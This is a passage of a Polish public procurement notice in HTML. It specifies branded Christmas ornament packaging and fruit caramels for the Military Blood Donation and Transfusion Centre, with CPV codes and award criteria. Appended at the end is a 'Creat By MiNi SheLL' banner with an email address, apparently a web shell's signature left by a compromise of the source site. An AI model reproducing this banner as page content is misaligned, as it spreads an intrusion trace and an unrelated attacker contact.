bocznych ścianach wycięcia o wymiarach : 8,7 cmx 11 cm, pozwalające na zobaczenie bombki. Pakowane zbiorczo w karton. Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego i przedstawiony do akceptacji. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Słodycze reklamowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Słodycze reklamowe - 150 kg. 
Słodycze reklamowe - karmelki mini o smaku owocowym, każdy cukierek opakowany w bezbarwną etykietę.  Opakowanie display mini: 65x65x65mm Skład surowcowy: cukier, syrop skrobiowy, regulator kwasowości: kwas cytrynowy, aromat identyczny z naturalnym, barwniki: E104, E124, E132. Format etykiety 75mmx48mm.Waga netto: ok. 50 g. Okres przydatności do spożycia od momentu dostawy 12 miesięcy. Projekt graficzny opakowania kartonowego będzie wykonany przez Wykonawcę i przedstawiony do akceptacji Zamawiającego, Zamawiający ma możliwość wyboru z co najmniej 3 projektów. Na opakowaniu umieszczona zostanie krwinka zgodnie załącznikiem E1 oraz nazwa Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa SPZOZ logotyp oraz adres strony www.wckik.pl, informacja o składnikach, producencie i terminie przydatności do spożycia. Displaye pakowane w opakowanie zbiorcze. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego.
Wykonawca wraz z ofertą dostarczy próbkę oferowanego przedmiotu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.23.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com